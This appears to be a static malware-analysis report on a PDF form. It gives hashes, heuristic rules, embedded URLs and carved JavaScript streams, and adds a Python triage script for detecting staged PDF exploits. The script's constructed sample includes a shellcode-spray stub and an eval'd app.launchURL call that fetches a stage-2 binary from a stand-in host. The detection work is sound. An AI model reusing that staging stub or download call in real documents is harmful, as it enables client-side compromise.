Malicious PDF — malware analysis report

Static analysis result for SHA-256 1863a08cb2e4d91b…

Verdict: MALICIOUS
File type: PDF
Size: 213.2 KB
Created: 2012-03-27 11:53:12 +02:00
Authoring application: swissforms Solutions
MD5: 9139544178d2257c77b9d4e8e43f3cf0
SHA-1: deeb93cf6f4faf7bf5556b1bafb384454b4a6d81
SHA-256: 1863a08cb2e4d91b0d82739c3d56c2e1975f799b88bc57f61a8dd481d0d477b1
Risk score: 214

Malware Insights

MITRE ATT&CK
  • T1059.007 Command and Scripting Interpreter: JavaScript
  • T1203 Exploitation for Client Execution

The PDF carries 23 JavaScript streams (carved below). Five of them contain eval(), unescape() or String.fromCharCode tokens inside the decoded content and one contains a long base64-like blob; the eval() and unescape() matches are scored high on their own, and their correlation with a fromCharCode use is what fires the critical PDF_JS_EXPLOIT_CLUSTER heuristic, the highest-severity finding in this report. The caveats stated by the individual rules apply here: generic form JavaScript, /AA handlers and fromCharCode are all common in benign interactive forms, ClamAV reports no threats in any carved stream, the authoring application is a forms product, and no carved stream is shown here to contain shellcode or a known CVE pattern, so the exploitation claim rests on token correlation rather than on a recovered exploit. The embedded URL http://pajhome.org.uk/crypt/md5 is the home page of a widely used JavaScript MD5 implementation, and the three unicode.org URLs point at the TR35 number-format and TR18 regular-expression specifications; URLs of this kind typically appear in library headers and comments. Acrobat JavaScript can only open or fetch a URL through APIs such as app.launchURL(), submitForm(), getURL() or Net.HTTP, so whether any of these URLs serves as a channel for a secondary payload should be decided by checking which API, if any, reaches it in the decoded streams rather than from its presence alone.

Machine Learning

  • Nyx PDF Classifier malicious score 0.6150

Heuristics 10

  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • eval() call high PDF_EVAL
    eval() found — commonly used for obfuscated exploit execution (matched inside decoded stream)
  • unescape() call high PDF_UNESCAPE
    unescape() found — often used to decode shellcode in PDF JS exploits (matched inside decoded stream)
  • JavaScript action low PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Additional-actions dictionary low PDF_AA
    PDF defines /AA (Additional Actions) that references an executable action (JS/JavaScript/Launch/SubmitForm) — can auto-trigger on document or widget events. Form-field calc/format/validate/keystroke handlers in legitimate interactive forms commonly fire this, so it is reported as a low-weight signal; weaponised auto-execution is flagged by stronger rules (PDF_OPENACTION, encrypted-with-JS, etc.)
  • String.fromCharCode low PDF_FROMCHARCODE
    String.fromCharCode found — used to construct payload strings dynamically. Common in benign JavaScript libraries for codepoint manipulation, so this alone is informational; weaponised use is also caught by the dedicated fromCharCode-stage and exploit-shape rules. (matched inside decoded stream)
  • AcroForm button with action trigger low PDF_ACROFORM_BUTTON
    PDF contains a /Btn form field together with a SubmitForm/URI/Launch/JS trigger — this is the building block of fake 'Download' or 'Open' button overlays used in PDF phishing lures
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://pajhome.org.uk/crypt/md5
    • http://www.unicode.org/reports/tr35/tr35-11.html#Number_Format_Patterns
    • http://www.unicode.org/reports/tr35/tr35-11.html#Lenient_Parsing
    • http://unicode.org/reports/tr18/
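The heuristics above describe a tiered triage: carve every /JS stream, inflate it, count the eval/unescape/fromCharCode staging tokens per stream (the "carved artifact contains N token(s)" notes in the extracted-artifact list), attach a channel label to each URL, and escalate to the cluster verdict only when the tokens are correlated. The following is an added example of that logic, not the analysis engine's code: rule names follow this report, but the severities for PDF_OPENACTION, the cluster threshold, the URL-sink list and the two constructed sample PDFs are assumptions. It runs offline on the two samples it builds itself; the benign one carries library-style comment URLs and lands at low, the staged one lands at critical with its URL labelled as an app.launchURL() argument.

```python
"""PDF JavaScript triage: carve /JS streams, inflate them, count eval/unescape/
fromCharCode staging tokens per stream, label each URL by the channel that
reaches it, and combine the signals into a tiered verdict. Added example, not
the engine's code; rule names follow the report, weights and samples are assumed."""
import re
import zlib

OBJ_RE = re.compile(rb"(\d+)\s+\d+\s+obj\s*(.*?)endobj", re.S)
STREAM_RE = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.S)
REF_RE = re.compile(rb"/JS\s+(\d+)\s+0\s+R")                 # /JS 4 0 R (indirect stream)
URL_RE = re.compile(rb"https?://[^\s'\"<>)]+")
SINK_RE = re.compile(rb"(app\.launchURL|submitForm|getURL|Net\.HTTP\.request)\s*\(")  # APIs that open/fetch a URL
TOKEN_RULES = {  # staging-token rules with the severities the report assigns them
    "PDF_EVAL": (re.compile(rb"\beval\s*\("), "high"),
    "PDF_UNESCAPE": (re.compile(rb"\bunescape\s*\("), "high"),
    "PDF_FROMCHARCODE": (re.compile(rb"String\.fromCharCode"), "low"),
}
RANK = {"info": 0, "low": 1, "high": 2, "critical": 3}


def parse_objects(pdf: bytes) -> dict:
    """Map object number -> (dictionary bytes, stream bytes or None); only /FlateDecode is inflated."""
    objs = {}
    for m in OBJ_RE.finditer(pdf):
        body, data = m.group(2), None
        sm = STREAM_RE.search(body)
        if sm:
            data, body = sm.group(1), body[: sm.start()]
            if b"/FlateDecode" in body:
                data = zlib.decompress(data)
        objs[int(m.group(1))] = (body, data)
    return objs


def carve_js(objs: dict) -> list:
    """[(object number, JavaScript bytes)] for every /JS reference that resolves to a stream."""
    found = []
    for d, _ in objs.values():
        for ref in REF_RE.findall(d):
            target = objs.get(int(ref))
            if target and target[1] is not None:
                found.append((int(ref), target[1]))
    return found


def url_channel(js: bytes, url: bytes) -> str:
    """Label how a URL is reached: argument of a URL-opening API, a comment, or a bare string."""
    pos = js.find(url)
    for sm in SINK_RE.finditer(js):
        if sm.end() <= pos < sm.end() + 256:          # URL sits in that call's argument list
            return "js-sink:" + sm.group(1).decode()
    line = js[js.rfind(b"\n", 0, pos) + 1 : pos].lstrip()
    return "js-comment" if line.startswith((b"//", b"/*", b"*")) else "js-string"


def triage(pdf: bytes) -> dict:
    objs = parse_objects(pdf)
    js_streams = carve_js(objs)
    dicts = b"".join(d for d, _ in objs.values())
    hits, tokens, urls, streams = {}, {}, [], []
    if js_streams:
        hits["PDF_JS"] = "low"
    if b"/OpenAction" in dicts:
        hits["PDF_OPENACTION"] = "high"              # assumed severity: fires on document open
    for num, js in js_streams:
        per_stream = 0
        for name, (rx, sev) in TOKEN_RULES.items():
            if n := len(rx.findall(js)):
                tokens[name] = tokens.get(name, 0) + n
                hits[name] = sev
                per_stream += n
        streams.append((num, len(js), per_stream))   # "carved artifact contains N token(s)"
        urls.extend((u.decode(), url_channel(js, u), num) for u in URL_RE.findall(js))
    # Assumed cluster threshold: a high-severity token correlated with at least one other token.
    if any(hits.get(r) == "high" for r in ("PDF_EVAL", "PDF_UNESCAPE")) and len(tokens) >= 2:
        hits["PDF_JS_EXPLOIT_CLUSTER"] = "critical"
    verdict = max(hits.values(), key=RANK.get, default="info")
    return {"verdict": verdict, "rules": hits, "tokens": tokens, "urls": urls, "streams": streams}


def build_pdf(js: bytes, auto_open: bool) -> bytes:
    """Constructed minimal PDF with one FlateDecode /JS stream (sample input, not a real file)."""
    data = zlib.compress(js)
    action = b" /OpenAction 3 0 R" if auto_open else b""
    head = (b"%PDF-1.4\n1 0 obj << /Type /Catalog /Pages 2 0 R" + action + b" >> endobj\n"
            b"2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj\n"
            b"3 0 obj << /S /JavaScript /JS 4 0 R >> endobj\n"
            b"4 0 obj << /Length " + str(len(data)).encode() + b" /Filter /FlateDecode >>\n")
    return head + b"stream\n" + data + b"\nendstream\nendobj\n%%EOF\n"


# Constructed samples: a form helper with library-style comment URLs, and a staged exploit.
BENIGN_PDF = build_pdf(b"""/*
 * Pattern syntax: http://www.unicode.org/reports/tr35/tr35-11.html#Number_Format_Patterns
 * MD5 routine adapted from http://pajhome.org.uk/crypt/md5
 */
function pad(n) { return String.fromCharCode(48 + n); }
event.value = pad(3);
""", auto_open=False)
WEAPON_PDF = build_pdf(b"""var sc = unescape("%u9090%u9090%ucccc");
var spray = []; for (var i = 0; i < 64; i++) spray[i] = sc + String.fromCharCode(0x0c0c);
eval("app.launchURL('http://example.invalid/stage2.bin', true)");
""", auto_open=True)
```

Calling triage(BENIGN_PDF) returns verdict "low" with only PDF_JS and PDF_FROMCHARCODE hit and both URLs labelled js-comment; triage(WEAPON_PDF) returns "critical" with the cluster rule set, three tokens counted in the single carved stream, and the URL labelled js-sink:app.launchURL. The per-URL channel label is the check that separates a library attribution comment from a real download channel; a real deployment would also handle inline /JS string literals, object streams, other stream filters and the /AA dictionary, which this example omits.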

Extracted artifacts 26

Files carved from inside the sample during analysis.

Filename (kind, source, size), followed by the file's SHA-256 and any per-file detection notes:

  • javascript_obj0077_000.js (pdf-javascript-stream, PDF /JS object 77 at offset 0x1C07D, 45 bytes)
    SHA-256 033cfe2ae60e1528f65c10fad3d200ead3549102d1ab209f12b58088bf2f12f5
  • javascript_obj0001_004.js (pdf-javascript-stream, PDF /JS object 1 at offset 0xF, 4875 bytes)
    SHA-256 09cc9bcbd59acf82e2be4a41727eedce5a538a736f2d65749c8b14153d70c125
  • javascript_obj0004_005.js (pdf-javascript-stream, PDF /JS object 4 at offset 0x680, 17129 bytes)
    SHA-256 c2f9e45a2d3f7ffd224908e29db59dec89b6f57df138d3bb5892cfc8e5e92c26
  • javascript_obj0006_006.js (pdf-javascript-stream, PDF /JS object 6 at offset 0x1508, 21193 bytes)
    SHA-256 157d94c4373fc7674528b2b92bd73c7fb605ba41abc50f521589bd013af87b68
    Detection: ClamAV no threats found; obfuscation or payload likely (carved artifact contains 1 eval/decoder/string-building token)
  • javascript_obj0008_007.js (pdf-javascript-stream, PDF /JS object 8 at offset 0x36E8, 33138 bytes)
    SHA-256 e6148b768af5b12460cf3e62fbab899b427b7493847763e208cddbfbe94685cd
  • javascript_obj0010_008.js (pdf-javascript-stream, PDF /JS object 10 at offset 0x5D2E, 144013 bytes)
    SHA-256 7a0d61602467a3ebb51eeb3dc0b4e5557e5cf228aa7352a5e4c4de5b6ad1e63e
  • javascript_obj0012_009.js (pdf-javascript-stream, PDF /JS object 12 at offset 0x12A1A, 8595 bytes)
    SHA-256 5076026448694df07d81995a6f52f2135c18b2bd6d0340fdaeebe7c5d9c2e63d
    Detection: ClamAV no threats found; obfuscation or payload likely (carved artifact contains 1 eval/decoder/string-building token)
  • javascript_obj0014_010.js (pdf-javascript-stream, PDF /JS object 14 at offset 0x135F8, 1049 bytes)
    SHA-256 f667de1ba2f5689c2db6ca8efec22f4cae905543c7e55765301e47c9d3e39d66
  • javascript_obj0016_011.js (pdf-javascript-stream, PDF /JS object 16 at offset 0x138AE, 6511 bytes)
    SHA-256 b6b999b2adc788b5c0dc152162423f5f3b63e2f337dfedd2c9460233e3dfeb59
    Detection: ClamAV no threats found; obfuscation or payload likely (carved artifact contains 2 eval/decoder/string-building tokens)
  • javascript_obj0018_012.js (pdf-javascript-stream, PDF /JS object 18 at offset 0x13F28, 10822 bytes)
    SHA-256 6bf6a9f966c7e84faccf5e1acbfdf2980a18334f7c940bcfc5fb9e40ee1ba433
  • javascript_obj0020_013.js (pdf-javascript-stream, PDF /JS object 20 at offset 0x14766, 16050 bytes)
    SHA-256 0ef5292eaf41a7acfb5be96479c28e894fecc14d034141148df12559285bac3f
    Detection: ClamAV no threats found; obfuscation or payload likely (carved artifact contains 1 eval/decoder/string-building token)
  • javascript_obj0022_014.js (pdf-javascript-stream, PDF /JS object 22 at offset 0x1538A, 14156 bytes)
    SHA-256 171aac8e2208b35087228e919d8c6b105689701aebd7f411e407cdb6ab3fbd35
  • javascript_obj0024_015.js (pdf-javascript-stream, PDF /JS object 24 at offset 0x16151, 24495 bytes)
    SHA-256 357ea0785b09f7df52440b553e24163e28a33a0338f6e8362055f93fb7167ae6
  • javascript_obj0026_016.js (pdf-javascript-stream, PDF /JS object 26 at offset 0x1778E, 2847 bytes)
    SHA-256 188a908fa79d1ccbba0b7fd097a9dd6d806a0b6a12816b4d6f1fa830305aed24
  • javascript_obj0028_017.js (pdf-javascript-stream, PDF /JS object 28 at offset 0x17B83, 10040 bytes)
    SHA-256 a862c3ff0be4b6e8e1a4ed20ca59fdded0cb583d2442c945783e90d4e1f7a7af
    Detection: ClamAV no threats found; obfuscation or payload likely (carved artifact contains 4 eval/decoder/string-building tokens)
  • javascript_obj0030_018.js (pdf-javascript-stream, PDF /JS object 30 at offset 0x18440, 4291 bytes)
    SHA-256 e66c83b43272af17b0ed43ded35819c9f2825ef88d352cce828881d135b64e16
  • javascript_obj0032_019.js (pdf-javascript-stream, PDF /JS object 32 at offset 0x18943, 11981 bytes)
    SHA-256 f0ec97d840ccf21d7d3207b6e09077506386513958c94020bc39ca48dfe900a1
  • javascript_obj0034_020.js (pdf-javascript-stream, PDF /JS object 34 at offset 0x19439, 3240 bytes)
    SHA-256 e1eb1ae9a28ca6809e490ab94557d9217f0ed671a55379737b41e00e159fd8d3
  • javascript_obj0036_021.js (pdf-javascript-stream, PDF /JS object 36 at offset 0x1981C, 8284 bytes)
    SHA-256 5c846df3aa78f4be63ebcbf1ee92a28b359eed60e284693e5daa5203b284a497
  • javascript_obj0062_022.js (pdf-javascript-stream, PDF /JS object 62 at offset 0x1A156, 213 bytes)
    SHA-256 88cf83eacfa4ab997462d207c0c2ed6b53626fc3794ce976e7bdf29d2c84f5d4
  • javascript_obj0068_023.js (pdf-javascript-stream, PDF /JS object 68 at offset 0x1A21C, 107 bytes)
    SHA-256 f24f44ca9d60dd42a63432989aaa4b625b3f58ca8efbcc9b7f760bb4a53d1e2a
  • javascript_obj0073_024.js (pdf-javascript-stream, PDF /JS object 73 at offset 0x1A2B4, 22529 bytes)
    SHA-256 d525969f37c2901a8a7bbb3f0c165714e656d3de62dc328dfaca4fcf93c5f648
  • javascript_obj0075_025.js (pdf-javascript-stream, PDF /JS object 75 at offset 0x1B3B5, 26599 bytes)
    SHA-256 92b7e8047d7db76b49f4b17cafb0874db7de5823f779184a767eb82d602c3560
    Detection: ClamAV no threats found; obfuscation or payload likely (carved artifact contains 1 long base64-like blob)
  • font_00_sfnt_off00024424.bin (pdf-font-stream, PDF embedded font (sfnt) at offset 0x24424, 21716 bytes)
    SHA-256 5eed140d5a671f128f7d4cc7e64d4eec766b38e1a6439b33e206bdb438ee7e0f
  • font_01_sfnt_off000262a0.bin (pdf-font-stream, PDF embedded font (sfnt) at offset 0x262A0, 7520 bytes)
    SHA-256 d95f58a119f91bee73a40907be6e78ab66835e98b1a3fa115966739358824f25
  • font_02_sfnt_off0002cf67.bin (pdf-font-stream, PDF embedded font (sfnt) at offset 0x2CF67, 34636 bytes)
    SHA-256 a6996f0f8cf243a903f852ac10837001b654e974e6d08713043a19bf9c48259d